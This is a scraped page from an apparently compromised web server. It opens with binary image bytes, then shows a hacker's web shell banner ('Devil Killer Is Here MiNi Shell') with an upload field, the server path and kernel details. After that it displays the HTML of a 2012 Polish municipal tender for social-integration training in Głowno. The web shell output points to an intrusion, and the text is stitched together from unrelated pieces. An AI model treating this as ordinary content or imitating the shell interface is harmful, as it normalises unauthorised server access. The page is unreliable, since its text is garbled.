JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120628/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120628/224534-N-2012.html

<p class="kh_header"><b>Głowno: Aktywna integracja w mieście Głowno</b><br>
<b>Numer ogłoszenia: 224534 - 2012; data zamieszczenia: 28.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Głownie , ul. Ludwika Norblina 1, 95-015 Głowno, woj. łódzkie, tel. 42 719 27 25, faks 42 719 27 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.glowno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Aktywna integracja w mieście Głowno.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest 
Zorganizowanie i przeprowadzenie usług szkoleniowych dla grupy 30 osób w tym 20 kobiet i 10 mężczyzn.
W tym:
Zajęcia z psychologiem i doradcą zawodowym , warsztaty, obejmują grupę 30 osób   
Szkolenia zawodowe obejmują grupę  jest 29 osób.

Szkolenia są realizowane w ramach projektu systemowego współfinansowanego 
ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki w ramach realizacji projektu Aktywna integracja w mieście Głowno

2.Opis przedmiotu zamówienia
2.1.Szczegółowy zakres rzeczowy przedmiotu umowy oraz sposób jej realizacji :
1)Zorganizowanie i przeprowadzenie spotkań z doradcą zawodowym w ramach aktywizacji zawodowej
a) spotkania grupowe- warsztaty dla 30 osób w ilości 10 godzin. Zajęcia odbywać się będą w  2 dniowym cyklu po 5 godzin. Zajęcia grupowe z doradcą zawodowym będą odbywać się w jednej grupie.
(1 godzina szkoleniowa - 45 minut zegarowych. Do czasu trwania szkolenia nie wlicza się przerw kawowych, przerw obiadowych, ani też żadnych innych przerw technicznych).

Spotkania grupowe maja na celu nabycie umiejętności odnalezienia się i zaprezentowania na tle grupy, wejście w relacje  interpersonalne z innymi osobami. Zajęcia grupowe mają mieć charakter warsztatowy, mają uczyć nowych zachowań i postaw na rynku pracy, przełamywać istniejące w uczestnikach bariery społeczne i zawodowe.
b) spotkania indywidualne po 5 godzin  dla każdego z 30 uczestników (łącznie150 godzin). (1 godzina szkoleniowa - 45 minut zegarowych. Do czasu trwania szkolenia nie wlicza się przerw kawowych, przerw obiadowych, ani też żadnych innych przerw technicznych).
Spotkania indywidualne mają mieć charakter zawodowy, a także terapeutyczny, wzmacniający dla uczestnika. Spotkania z doradcą mają na celu dać uczestnikom szansę większego poznania, otwarcia się i szczerego przedstawienia własnych trudności w znalezieniu pracy.

W ramach zajęć z doradcą zawodowym przewidziano następujące bloki tematyczne:
-identyfikacja posiadanych zasobów, mocnych i słabych stron, zdolności, zainteresowań,
-poznawanie uczestników oraz ich dotychczasowych doświadczeń związanych 
z poszukiwaniem pracy,
-rynek pracy - metody aktywnego poszukiwania pracy,
-skuteczne przygotowanie się do rozmowy kwalifikacyjnej, elementy autoprezentacji,
-określenie umiejętności i predyspozycji zawodowych, zasady przygotowania dokumentów aplikacyjnych.

Termin wykonania usługi - na realizację zamówienia przewidziane są dwa miesiące.

2) Zorganizowanie i przeprowadzenie zajęć grupowych i indywidualnych 
z psychologiem. 
Zajęcia mają na celu wzmocnienie pozycji jednostki w grupie, kształtowanie nowych umiejętności interpersonalnych i zasad funkcjonowania w życiu społecznym
W ramach zajęć z psychologiem przewidziano:
a)Trening kompetencji i umiejętności społecznych - zajęcia dla grupy 30 uczestników w ilości 20 godzin .Zajęcia grupowe z psychologiem przewidziane są w jednej grupie.
(1 godzina szkoleniowa = 45 minut zegarowych. Do czasu trwania szkolenia nie wlicza się przerw kawowych, przerw obiadowych, ani też żadnych innych przerw technicznych).
b)- Zajęcia indywidualne z psychologiem po 6 godzin dla każdego uczestnika z grupy 30 osobowej (łącznie 180 godzin).
(1 godzina szkoleniowa - 45 minut zegarowych. Do czasu trwania szkolenia nie wlicza się przerw kawowych, przerw obiadowych, ani też żadnych innych przerw technicznych).

W ramach zajęć z psychologiem przewidziano następujące bloki tematyczne:
-budowa zaufania - integracja grupy,
-sztuka komunikacji interpersonalnej- podstawowe pojęcia , sposoby komunikacji, bariery komunikacyjne, autoprezentacja.
-asertywność, postawy asertywne, asertywność w pracy, sztuka konwersacji, budowanie relacji interpersonalnych.
- Ile jesteś wart - poczucie własnej wartości i godności.

Termin wykonania usługi  na realizację zamówienia przewidziane są dwa miesiące.

3)Warsztaty - gospodarowanie budżetem domowym  zajęcia grupowe - 15 godzin 
(1 godzina szkoleniowa -45 minut zegarowych. Do czasu trwania szkolenia nie wlicza się przerw kawowych, przerw obiadowych, ani też żadnych innych przerw technicznych.) 
dla grupy 30 uczestników.
W ramach warsztatów przewidziano następujące bloki tematyczne:
-pojecie budżetu i jego zastosowanie. Budżet domowy.
-jak rozsądnie gospodarować budżetem domowym,
-czy i jak korzystać z kredytów?
-jak wyjść z pętli zadłużenia?
Termin wykonania usługi  - na realizację zamówienia przewidziany jest jeden miesiąc.

4)Warsztaty - Wizaż mój wizerunek zajęcia grupowe - 15 godzin dla grupy 30 osób
(1 godzina szkoleniowa - 45 minut zegarowych. Do czasu trwania szkolenia nie wlicza się przerw kawowych, przerw obiadowych, ani też żadnych innych przerw technicznych)
W ramach warsztatów przewidziano następujące bloki tematyczne:
-stylizacja sylwetki kobiet i mężczyzn,
-analiza kolorystyczna,
-podstawy wizażu.
W ramach warsztatów Wizaż mów wizerunek zaplanowano zajęcia w dwóch grupach
 w następującym podziale:
-10 godzin dla grupy 20 kobiet.
-5 godzin dla grupy  10 mężczyzn.
Termin wykonania usługi  - na realizację zamówienia przewidziany jest jeden miesiąc.

5)Szkolenia zawodowe dla grupy 29 osób łącznie:
5.1) Rękodzielnictwo - 5 osób - 80 godz.
1 godzina szkoleniowa - 45 minut zegarowych. Do czasu trwania szkolenia nie wlicza się przerw kawowych, przerw obiadowych, ani też żadnych innych przerw technicznych.

 Program szkolenia:
1.Bezpieczeństwo i higiena pracy.
2.Wyjaśnienie pojęć związanych z tematyką szkolenia.
3.Historia decoupage.
4.Style i kierunki w decoupage.
4.1.  rodzaje spękań
-efekt delikatny
-efekt ceramiki
-efekt skóry
-efekt country
-efekt fresku
5.Przygotowanie powierzchni przedmiotu.
6.Dobór kolorystyki i elementów zdobniczych.
7.Ustalenie szczegółów kompozycji zdobiących przedmiot.
8.Zabezpieczanie gotowej pracy.
9.Naklejanie motywów decoupage na różnych powierzchniach m.in.:
9.1. Ozdobny woreczek. Decoupage na tkaninie, użycie nowego kleju do naklejania motywów z papieru na tkaninę.
9.2.Prezent. Ozdabianie pudełka i dachówki nowym papierem i perłowymi farbami.
9.3.Wiejski pejzaż.
10.Wyroby korali , broszek, kolczyków z różnych materiałów m.in.:
10.1 Wykonanie naszyjników ze szklanych koralików na metalowej żyłce - podstawy wyrobu biżuterii.
10.2 Zdobienie drewnianych korali z wykorzystaniem serwetek ryżowych i farb metalizujących.
10.3 Wykonywanie elementów z masy imitującej kamień.
10.4 Wykańczanie prac lakierem i farbami.
11. Wyplatanie koszy ze sznurka - wykonywanie splotów
12. Wyroby z gipsu.
13. Technika kolażu w ozdabianiu przedmiotów.
14. Wyroby z masy solnej.
15. Wykonywanie przedmiotów ozdobnych z naturalnych przedmiotów
16. Ikony.
Firma szkoleniowa zapewnia wszystkie niezbędne materiały do wykonania powyższych zadań.
5.2) Aranżacja terenów zielonych - 11 osób - 120 godz.
1 godzina szkoleniowa - 45 minut zegarowych. Do czasu trwania szkolenia nie wlicza się przerw kawowych, przerw obiadowych, ani też żadnych innych przerw technicznych.
Program szkolenia:  
Program kursu Aranżacja ogrodów i terenów zielonych obejmuje zagadnienia z zakresu przedsiębiorczości, doboru roślin, projektowania ogrodów, odpowiedniego przygotowania podłoża i nasadzenia roślin. 
1. Podstawy przedsiębiorczości
-Ogólne zasady prowadzenia działalności 
-Wybrane źródła finansowania działalności gospodarczej
- Zasady przygotowania dokumentacji aplikacyjnej
2. Dobór roślin pod względem barwy, kształtu, zapachu i faktury
-Rośliny iglaste i zimozielone 
-Rośliny jednoroczne i dwuletnie 
-Byliny 
-Drzewa ozdobne tracące liście 
-Żywopłoty
3. Projekt ogrodu 
-Komponowanie przestrzeni: przestrzeń i funkcja 
-Zasady przygotowania projektu. 
- Proporcje form w ogrodzie. 
- Scenariusz i program ogrodu (ogród frontowy, taras, ganek, kącik dla dziecka, ogród ozdobny i użytkowy: ziołowy i warzywny)
-Plan i makieta ogrodu 
4. Zakładanie ogrodu 
-Wstępne rozeznanie i pomiar terenu 
-Porządkowanie terenu 
- Nawadnianie
- Odprowadzanie wody z ogrodu
-Zakładanie trawnika
- Założenie rabaty z roślin jednorocznych, dwuletnich i wieloletnich
- Nasadzenia krzewów ozdobnych 
- BHP na stanowisku pracy.
5.3) Kasjer handlowy  -  9 osób - 128 godz.
1 godzina szkoleniowa - 45 minut zegarowych. Do czasu trwania szkolenia nie wlicza się przerw kawowych, przerw obiadowych, ani też żadnych innych przerw technicznych. 
Program szkolenia:
-bezpieczeństwo i higiena pracy;
-ochrona przeciwpożarowa;
-udzielenie pierwszej pomocy na miejscu wypadku;
-budowa i obsługa kasy;
-programowanie kas: (przynajmniej 4 modeli);
-praca na kasie (teoria + praktyka, przynajmniej 4 modeli ),
-drukowanie raportów;
-wystawienie faktur i rachunków;
Całe szkolenie ma zawierać elementy teoretyczne i praktyczne nauki zawodu.
Wykonawca -firma szkoleniowa zapewnia sprzęt niezbędny do przeprowadzenia szkolenia 
 tj.: 1 kasa na 1 uczestnika szkolenia.

5.4) Stylizacja paznokci z elementami makijażu - 3 osoby - 85 godz.
1 godzina szkoleniowa - 45 minut zegarowych. Do czasu trwania szkolenia nie wlicza się przerw kawowych, przerw obiadowych, ani też żadnych innych przerw technicznych.
Program szkolenia:
- BHP na stanowisku pracy;
- prowadzenie władnej działalności gospodarczej - zasady;
- organizacja stanowiska pracy;
- zapoznanie z narzędziami niezbędnymi do wykonywania pracy;
- budowa i choroby paznokcia;
- manicure i zabiegi pielęgnacyjne dłoni;
- przedłużanie paznokci żelem;
- przedłużanie paznokci akrylem;
- zdobnictwo - metody zdobienia: malowanie, ozdoby malowane i wtapiane;
- pedicure i pielęgnacja stóp;
- masaż stóp
- malowanie płytki paznokciowej;
- środki do makijażu;
- przybory do makijażu;
- przygotowanie skóry do makijażu;
- analiza kolorystyczna - typy kolorystyczne urody odpowiadającym porom roku;
- techniki malowania i korygowania twarzy ,
- wykonywanie makijażu dziennego i wieczorowego.

Wykonawca - firma szkoleniowa musi zapewnić wszystkie niezbędne materiały do wykonania powyższych zadań. 

5.5) Grafik komputerowy - 1 osoba - 180 godz. 
1 godzina szkoleniowa - 45 minut zegarowych. Do czasu trwania szkolenia nie wlicza się przerw kawowych, przerw obiadowych, ani też żadnych innych przerw technicznych.

Program szkolenia:
Poznawanie narzędzi programowych oraz modyfikowanie parametrów pracy w programie np.: CorelDRAW 
1)Podstawy rysunku wektorowego
2)Nadawanie obiektom wypełnień i konturów 
3)Wstawianie i modyfikowanie tekstu 
4)Precyzyjne rysowanie obiektów wektorowych
5)Modyfikowanie kształtu obiektu i krzywych (krzywe Beziera)
6)Rysowanie linii
7)Modyfikacje obiektów wektorowych
8)Stosowanie efektów do obiektów wektorowych
9)Importowanie oraz eksportowanie grafiki
10)Podstawowe elementy pracy w programie np.: Adobe Photoshop 
11)Praca z kolorem
12)Metody zaznaczania obrazków
13)Narzędzia edycyjne
14)Stosowanie kanałów w pracy z obrazkami
15)Stosowanie warstw w pracy z obrazkami
16)Korekty tonalne i barwne
17)Modyfikacja obrazków
18)Wykorzystanie obiektów tekstowych w obrazku
19)Terminologia związana z drukiem
20)Drukowanie materiałów kompozytowych
21)Przygotowanie materiału do naświetleń oraz sprawdzenie poprawności dokonanej separacji kolorów 
22)Zadania - podstawowy element automatyzacji pracy
23)Droplety
24)Przetwarzanie wsadowe
25)Stosowanie podstawowych zasad budowy napisów i interlinii wykorzystywanych w liternictwie
26)Reguły konstruowania układów literniczych
27)Właściwości i oddziaływanie barw - sposoby wykorzystania tego w praktyce
28)Rodzaje kompozycji i podstawowe zasady prawidłowego komponowania
29)Wykonywanie kompozycji kolorystycznych i literniczych
30)Projektowanie znaku firmy opartego na kompozycji literniczej
31)Projektowanie afiszy informacyjnych i plakatów
32)Charakteryzowanie elementów reklamy zewnętrznej i warunków jej skuteczności
33)Opracowanie projektu billboardu
Wykonawca - firma szkoleniowa zapewnia sprzęt komputerowy oraz oprogramowanie niezbędne do nauki zawodu.

2.2. W ramach przedmiotu zamówienia, w zakresie wszystkich szkoleń, warsztatów, spotkań, Wykonawca zobowiązany jest do:
- zapewnienia w trakcie wszystkich spotkań , szkoleń , warsztatów  grupowych,dotyczyrównież wszystkich szkoleń zawodowych, ciepłego posiłku tj. drugie danie ( mięso , ziemniaki lub frytki , zestaw surówek ) oraz suchego poczęstunku ( ciastka, kawa , herbata, cukier, mleko,śmietanka do kawy, woda mineralna, sok).
-  zapewnienia w trakcie spotkań indywidualnych suchego poczęstunku ( ciastka, kawa , herbata, cukier, mleko,śmietanka do kawy, woda mineralna, sok), uzupełniane na bieżąco dla każdego uczestnika.
- zapewnienia fachowej kadry prowadzącej szkolenia,spotkania, warsztaty oraz stałej opieki metodycznej;
- zapewnienie sali wykładowej wraz ze sprzętem i materiałami niezbędnymi dla przeprowadzenia szkolenia, wymaga się aby szkolenia odbywały się na terenie miasta Głowno.;
- przygotowania i druku materiałów dydaktycznych;
- ubezpieczenia uczestników szkolenia od następstw nieszczęśliwych wypadków związanych z uczestnictwem w szkoleniach grupowych i indywidualnych oraz w drodze do i z miejsca szkolenia.
- przygotowania i druku świadectw ukończenia szkolenia (zaświadczeń,certyfikatów potwierdzających odbycie spotkań,szkoleń na druku MEN),z naniesionymi odpowiednio logotypami. 
Nabyte kwalifikacje  rodzaj uprawnień  typ dokumentu potwierdzającego ukończenie kursu, Zaświadczenie o ukończeniu kursu i Zaświadczenie  potwierdzające posiadanie kwalifikacji zawodowych zgodnie z rozporządzeniem Ministra Edukacji i Nauki z dnia 03.02.2006r. w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formie pozaszkolnej( Dz. U. z 2006r. Nr 31 poz.216);
- zabezpieczenia materiałów szkoleniowych (długopisy, notatniki, zestawy ćwiczeń z instrukcjami , niezbędne materiały do przeprowadzenia poszczególnych szkoleń zawodowych);
- dokumentowania prowadzonych zajęć i działań poprzez sporządzanie list obecności, list odbioru materiałów szkoleniowych, 
- prowadzenia dzienników spotkań , szkoleń , warsztatów. 
- wykonania szczegółowego programu oraz harmonogramu szkoleń, spotkań,warsztatów.
- zapewnienia oznakowania obowiązującymi logotypami POKL wszystkich materiałów szkoleniowych i dydaktycznych oraz pomieszczeń w których będą odbywać się szkolenia.

1 godzina dydaktyczna - 45 minut zegarowych. Do czasu trwania szkolenia nie wlicza się przerw kawowych, przerw obiadowych, ani też żadnych innych przerw technicznych.

2.3.  Szkolenia muszą być zorganizowane i przeprowadzone zgodnie z:
1)  Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 roku w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216 ).

3. Wykonawca jest zobowiązany do zdobycia wszelkich informacji, które mogą być konieczne do przygotowania oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania za spełniony, 
gdy Wykonawca jest wpisany do rejestru instytucji szkoleniowych zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004r o promocji zatrudnienia i instytucjach runku pracy ( Dz.U. z 2008r. Nr 69, poz. 415, z póź. zm.) oraz, że jest wpisany do rejestru agencji zatrudnienia prowadzonego przez marszałka województwa, właściwego ze względu na siedzibę Wykonawcy oraz złoży wraz z ofertą oświadczenie w tym zakresie zgodnie z oświadczeniem o spełnianiu warunków udziału w postępowaniu o treści odpowiadającej treści art. 22 ust. 1 ustawy Prawo zamówień publicznych.

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły 
  spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach  (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Udokumentowanie należytego wykonania w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, minimum 2 zamówień (z każdego rodzaju), polegających  na wykonywaniu usług w zakresie przeprowadzenia szkoleń, /spotkań z doradcą zawodowym oraz z psychologiem a także szkolenia zawodowe o tematyce co najmniej: Rękodzielnictwa, Aranżacja terenów zielonych, Grafik komputerowy  oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie.
 (wzór - załącznik nr 2 do SIWZ).

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły 
  spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach  (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dysponowania odpowiednim potencjałem technicznym do wykonywania zamówienia za spełniony, gdy Wykonawca złoży wraz z ofertą oświadczenie o spełnianiu warunków udziału w postępowaniu o treści odpowiadającej treści art. 22 ust. 1 ustawy Prawo zamówień publicznych.

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły 
  spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach  (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do ofert.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dysponowania osobami zdolnymi do wykonania zamówienia za spełniony, gdy Wykonawca udokumentuje dysponowanie osobami posiadającymi wiedzę, wykształcenie i doświadczenie
a)	w zakresie  spotkań z doradcą zawodowym  - dysponuje co najmniej dwoma osobami będącymi doradcą zawodowym z wyższym wykształceniem, posiadającymi studia podyplomowe lub kursy uzupełniające z zakresu doradztwa zawodowego oraz co najmniej rok doświadczenia zawodowego w pracy  z osobami wykluczonymi społecznie.
b)	W zakresie spotkań z psychologiem - dysponuje co najmniej dwoma osobami będącymi psychologiem , które ukończyły jednolite studia magisterskie na kierunku psychologii oraz odbyły wymagany staż zawodowy.
c)	W zakresie warsztatów Gospodarowania budżetem domowym -dysponuje co najmniej 1 osobą posiadającą wykształcenie wyższe posiadającą minimum 2 letnie doświadczenie w zakresie prowadzenia szkoleń. 
d)	W zakresie warsztatów Wizaż, mój wizerunek -dysponuje co najmniej 2 osobami posiadającymi wykształcenie wyższe posiadającymi mnimum 2 letnie doświadczenie w zakresie prowadzenia szkoleń.
e)	W zakresie szkoleń zawodowych:
- Rękodzielnictwa-dysponuje co najmniej 1 osobą posiadającą wykształcenie wyższe posiadającą minimum 2 letnie doświadczenie w zakresie prowadzenia szkoleń.
-Aranżacja terenów zielonych -dysponuje co najmniej 1 osobą posiadającą wykształcenie wyższe posiadającą minimum 2 letnie doświadczenie 
w zakresie prowadzenia szkoleń.
- Kasjer handlowy -dysponuje co najmniej 1 osobą posiadającą wykształcenie wyższe posiadającą minimum 2 letnie doświadczenie w zakresie prowadzenia szkoleń.
- Stylizacja paznokci z elementami makijażu -dysponuje co najmniej 1 osobą posiadającą wykształcenie wyższe posiadającą minimum 2 letnie doświadczenie w zakresie prowadzenia szkoleń.
- Grafik komputerowy -dysponuje co najmniej 1 osobą posiadającą wykształcenie wyższe posiadającą minimum 2 letnie doświadczenie w zakresie prowadzenia szkoleń.

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły 
  spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach  (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do ofert.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek sytuacji ekonomicznej i finansowej za spełniony, 
gdy Wykonawca złoży wraz z ofertą oświadczenie o spełnianiu warunków udziału 
w postępowaniu o treści odpowiadającej treści art. 22 ust. 1 ustawy Prawo zamówień publicznych.

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły 
  spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach  (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
